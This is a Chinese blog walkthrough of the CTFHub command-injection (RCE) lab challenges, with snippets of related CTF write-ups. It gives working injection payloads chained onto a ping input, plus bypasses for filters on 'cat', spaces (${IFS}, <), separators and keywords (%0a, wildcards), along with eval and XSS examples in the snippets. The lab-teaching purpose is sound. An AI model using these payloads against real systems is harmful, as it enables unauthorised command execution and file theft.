CTFhub技能树web-RCE

最新推荐文章于 2025-03-09 23:21:38 发布
最新推荐文章于 2025-03-09 23:21:38 发布
阅读量1.3k 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xmd213131/article/details/105331341
版权

1.命令注入
打开源代码发现是一个ping命令
在这里插入图片描述
这个命令的格式就很linux

linux中命令的链接符号:

1.每个命令之间用;隔开
说明:各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,
但不保证每个命令都执行成功。

2.每个命令之间用&&隔开
说明:若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。
3.每个命令之间用||隔开
说明:||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功
一条命令为止。
4. | 是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。
root@ubuntu: x | y | z
在第1个作业中,shell将任务x的标准输出重定向到任务y的标准输入,同时还将y的标准输出重定向到z的标准输入
5. & 是后台任务符号。 后台任务符号使shell在后台执行该任务,这样用户就可以立即得到一个提示符并继续其他工作。

我们使用||和|:
127.0.0.1||ls
在这里插入图片描述
127.0.0.1||cat 90971940019205.php|base64(用base64的原因是直接打印不会输出)
在这里插入图片描述2.过滤cat

cat 由第一行开始显示内容,并将所有内容输出

tac 从最后一行倒序显示内容,并将所有内容输出

more 根据窗口大小,一页一页的现实文件内容

less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符

head 只显示头几行

tail 只显示最后几行

nl 类似于cat -n,显示时输出行号

tailf 类似于tail -f

我们使用more
在这里插入图片描述127.0.0.1||more ****|base64
在这里插入图片描述
3.过滤空格
(1).使用<代替空格
127.0.0.1|cat<flag_14933269011986.php|base64
(2).使用${IFS}代替空格
(3).使用$IFS$9代替空格
在这里插入图片描述4.过滤目录分割符
使用;符号分割命令

127.0.0.1;cd flag_is_here;cat flag_1201231973867.php|base64

在这里插入图片描述
5.过滤运算符
和4一样
但是要注意,管道符号不能用了,因此我们要用base64 file的形式来输出文件内容,如"base64 1.php".这个与****|base64是等价的
6.综合过滤
%0a可以代替;符号,但是要在url处输入,不然会被再次转义
空格用${IFS}代替
flag被过滤了可以用正则表达式f***_is_here,或者使用%09*_is_here补全

127.0.0.1%0acd${IFS}f***_is_here${IFS}%0abase64${IFS}f***_7046120744675.php

在这里插入图片描述

CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2545
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
CTFHub技能树webRCE(一)
wzhwzh123321的博客
02-18 842
根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了一个名为cmd的变量的值(是否非空),eval是将一串字符作为php代码执行,$_REQUEST默认包含了。使用hackbar传递POST请求,file为php://input使得POST参数可以作为原始请求的数据,使用bp抓包,即可看到执行POST参数中代码后的内容。substr函数是返回字符串的子串,意思是如果file的前六个字符为php://,那么就会包含file文件。
CTFHUB-技能树-Web-XSS-反射型
Static______的博客
04-11 1922
参考链接:https://blog.youkuaiyun.com/weixin_43486981/article/details/107974878。特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入。提交后,在第二个框中访问第一个框注入XSS脚本后的网址。XSS platform平台,在上面注册一个账号。提交后,在XSS平台查看注入结果。
CTFHub技能树Web-SSRF
最新发布
2503_90824938的博客
03-09 514
因为个人技术原因CTFHub——SSRF——Redis协议与CTFHub——SSRF——FastCGI协议暂时无法提供攻略。得到提示,只能从127.0.0.1观看,请求需要他所在的服务器发送,需要BP。进入靶机访问flag.php,得到空搜索框,查看页面源代码获取key。构造POST请求数据包,将请求数据包进行url编码。@前面的相当于用户名字,用这样的方法访问flag。一次编码后将%0a替换成%0D%0a。F12查看器中鼠标右键编辑html。url访问flag得到flag。查看页面源代码得到flag。
CTFHub-rce
CN天狼
02-19 1418
CTFHub-rce
CTFHUB-RCE
cainiao17441898的博客
03-14 402
eval执行 查看源码后发现。让把命令赋值给cmd然后执行 先看一下根目录下有什么,命令:?cmd=system(‘ls’); 再回到上一级看看。发现了flag 打开flag就行了。
CTFhub-RCE
weixin_51706044的博客
06-01 761
文章目录一、命令注入过滤cat过滤空格 一、命令注入 既然提示输入IP让我们输入本地试试 127.01.01.1 得到显示后,尝试得到该路径下文件 127.01.01.1&ls 获取文件内容信息 127.01.01.1&cat 120731029228103.php 没有结果,这里可能是文件中包含特殊符号,使用管道运行base64加密内容 127.01.01.1&cat *.php | base64 尝试base64解密 这里还有第二种方法,利用命令执行写入一句
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2655
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHub-Web-RCE-文件包含
qq_54037445的博客
11-29 1076
文件包含,伪协议
ctfhub技能树webRCE里的eval执行和命令注入
2302_81010533的博客
03-30 608
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
CTFHub-RCE
a21536545645的博客
07-05 255
一,介绍 RCE是远程代码/命令执行,可以直接在目标主机上执行代码或者命令,危害极大。一般是因为对输入的过滤不严格导致,常见于有调用系统命令或者调用代码执行函数的地方。 二,命令注入 后台直接执行系统命,一般要结合linux,windows的管道对要执行的命令进行拼接。 过滤的话大致分为两种情况:白名单,黑名单 黑名单是过滤到一些常用的参数,如果过滤的不全面可以考虑用其他相同功能的函数代替;如果黑名单比较全面,那就要考虑用编码的方式尝试绕过。 白名单是限制参数的使用范围,写死了的话应该常规的办法就没有用了
CTFHub----RCE
qq_44418229的博客
06-09 623
CTFHub----RCE
ctfhub RCE
2202_75317918的博客
01-27 1163
ctfhub rce
ctfhubRCE通关
01-28 1537
ctfhubRCE通关记录:命令注入、过滤cat、过滤空格、过滤目录分隔符、过滤运算符、综合过滤练习。
CTFHubRCE
2401_86190146的博客
01-19 1109
(远程代码执行)漏洞允许攻击者通过远程控制目标系统,执行任意代码或命令。常见的RCE漏洞类型包括和。
CTFHub:Rce
2301_80911344的博客
04-06 1279
RCE,即远程代码执行(Remote Code Execution),是指攻击者通过网络向目标计算机发送恶意指令或代码,成功地在目标计算机上远程执行这些指令或代码的能力。RCE是一种严重的安全漏洞,因为它允许攻击者在没有物理接触或认证的情况下控制另一台计算机。获取系统的控制权限。改变或破坏数据。启动或终止进程。在受影响的系统上安装恶意软件。监视用户行为或窃取敏感信息。因为RCE能够提供如此高级的控制权限,所以这类漏洞通常被认为是非常严重的,并且在被发现后应该立即修补。
CTFHub 技能树rce
weixin_63231007的博客
05-18 1348
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树,综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...
Ctfhub解题 web XSS反射型
weixin_46703850的博客
03-16 744
Ctfhub解题 web XSS反射型 介绍:记录解题过程 XSS Reflex提交1,弹窗 利用XSS platform平台 在XSS platform平台上面注册一个账号,创建一个项目:(根据提示创建即可) 配置 查看代码 根据提示,把XSS平台给出的代码复制到第一个输入框(XSS Reflex)中进行注入 提交后,在第二个框中访问第一个框注入XSS脚本后的网址 提交后,在XSS平台查看注入结果,即可得到flag cookie : flag=ctfhub{8
CTFHub技能树RCE命令注入
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
03-19 5383
1.命令注入 // 关键代码 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip, $cmd = "ping -c 4 {$_GET['ip']}";// 运行命令,可以拼接 exec($cmd, $res);// 执行cmd,把结果输出到res } if ($res) { ...
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值